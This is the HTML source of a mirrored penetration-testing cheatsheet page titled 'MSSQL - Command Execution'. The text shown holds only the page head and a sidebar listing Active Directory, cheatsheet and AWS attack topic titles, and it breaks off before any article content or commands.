swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
InternalAllTheThings/databases/mssql-command-execution/index.html

4692 lines
127 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Active Directory and Internal Pentest Cheatsheets">
<link rel="canonical" href="https://swisskyrepo.github.io/InternalAllTheThings/databases/mssql-command-execution/">
<link rel="prev" href="../mssql-audit-checks/">
<link rel="next" href="../mssql-credentials/">
<link rel="icon" href="../../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.44">
<title>MSSQL - Command Execution - Internal All The Things</title>
<link rel="stylesheet" href="../../assets/stylesheets/main.0253249f.min.css">
<link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
<style>
.social-container {
float: right;
}
</style>
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../../custom.css">
<script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website" >
<meta property="og:title" content="MSSQL - Command Execution - Internal All The Things" >
<meta property="og:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta property="og:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/databases/mssql-command-execution.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/InternalAllTheThings/databases/mssql-command-execution/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="MSSQL - Command Execution - Internal All The Things" >
<meta name="twitter:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/databases/mssql-command-execution.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#mssql-command-execution" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href="../.." title="Internal All The Things" class="md-header__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Internal All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
MSSQL - Command Execution
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href="../.." title="Internal All The Things" class="md-nav__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Internal All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../.." class="md-nav__link">
<span class="md-ellipsis">
Internal All The Things
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
<label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
<span class="md-ellipsis">
Active directory
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_2">
<span class="md-nav__icon md-icon"></span>
Active directory
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../active-directory/ad-adcs-certificate-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Certificate Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-acl-ace/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Access Controls ACL/ACE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-enumerate/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-group-policy-objects/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Group Policy Objects
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-groups/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Groups
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-linux/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Linux
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-machineaccountquota/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Machine Account Quota
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-ntds-dumping/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - NTDS Dumping
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adds-rodc/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Read Only Domain Controller
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-adfs-federation-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Federation Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-integrated-dns/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Integrated DNS - ADIDNS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-roasting-asrep/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - ASREP Roasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-roasting-kerberoasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Kerberoasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-roasting-timeroasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Timeroasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/ad-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/deployment-sccm/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - SCCM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/deployment-wsus/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - WSUS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/hash-capture/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Capture and Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/hash-over-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - OverPass-the-Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/hash-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass the Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/hash-pass-the-key/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass The Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/internal-dcom/" class="md-nav__link">
<span class="md-ellipsis">
Internal - DCOM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/internal-mitm-relay/" class="md-nav__link">
<span class="md-ellipsis">
Internal - MITM and Relay
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/internal-pxe-boot-image/" class="md-nav__link">
<span class="md-ellipsis">
Internal - PXE Boot Image
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/internal-shares/" class="md-nav__link">
<span class="md-ellipsis">
Internal - Shares
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/kerberos-bronze-bit/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Bronze Bit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/kerberos-delegation-constrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/kerberos-delegation-rbcd/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Resource Based Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/kerberos-delegation-unconstrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Unconstrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/kerberos-s4u/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Service for User Extension
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/kerberos-tickets/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Tickets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-comments/" class="md-nav__link">
<span class="md-ellipsis">
Password - AD User Comment
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-dsrm-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - DSRM Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-group-policy-preferences/" class="md-nav__link">
<span class="md-ellipsis">
Password - Group Policy Preferences
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-precreated-computer/" class="md-nav__link">
<span class="md-ellipsis">
Password - Pre-Created Computer Account
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-read-gmsa/" class="md-nav__link">
<span class="md-ellipsis">
Password - GMSA
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-read-laps/" class="md-nav__link">
<span class="md-ellipsis">
Password - LAPS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-shadow-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - Shadow Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/pwd-spraying/" class="md-nav__link">
<span class="md-ellipsis">
Password - Spraying
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/trust-pam/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Privileged Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/trust-relationship/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Relationship
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/trust-sid-hijacking/" class="md-nav__link">
<span class="md-ellipsis">
Child Domain to Forest Compromise - SID Hijacking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/trust-ticket/" class="md-nav__link">
<span class="md-ellipsis">
Forest to Forest Compromise - Trust Ticket
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_44" >
<label class="md-nav__link" for="__nav_2_44" id="__nav_2_44_label" tabindex="0">
<span class="md-ellipsis">
CVE
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_2_44">
<span class="md-nav__icon md-icon"></span>
CVE
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../active-directory/CVE/MS14-068/" class="md-nav__link">
<span class="md-ellipsis">
MS14-068 Checksum Validation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/CVE/NoPAC/" class="md-nav__link">
<span class="md-ellipsis">
NoPAC / samAccountName Spoofing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/CVE/PrintNightmare/" class="md-nav__link">
<span class="md-ellipsis">
PrintNightmare
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/CVE/PrivExchange/" class="md-nav__link">
<span class="md-ellipsis">
PrivExchange
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../active-directory/CVE/ZeroLogon/" class="md-nav__link">
<span class="md-ellipsis">
ZeroLogon
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
Cheatsheets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
Cheatsheets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cheatsheets/escape-breakout/" class="md-nav__link">
<span class="md-ellipsis">
Kiosk Escape and Jail Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/hash-cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/mimikatz-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/miscellaneous-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous &amp; Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/network-discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/powershell-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/shell-bind-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/shell-reverse-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cheatsheets/source-code-management-ci/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
Cloud
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
Cloud
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_1" >
<label class="md-nav__link" for="__nav_4_1" id="__nav_4_1_label" tabindex="0">
<span class="md-ellipsis">
Aws
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_1">
<span class="md-nav__icon md-icon"></span>
Aws
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-access-token/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Access Token &amp; Secrets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-cli/" class="md-nav__link">
<span class="md-ellipsis">
AWS - CLI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-cognito/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Cognito
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-dynamodb/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - DynamoDB
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-ec2/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - EC2
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-iam/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Identity &amp; Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-ioc-detection/" class="md-nav__link">
<span class="md-ellipsis">
AWS - IOC &amp; Detections
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-lambda/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Lambda &amp; API Gateway
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-metadata/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Metadata SSRF
</span>
</a>
</li>
<li class="md-nav__item">
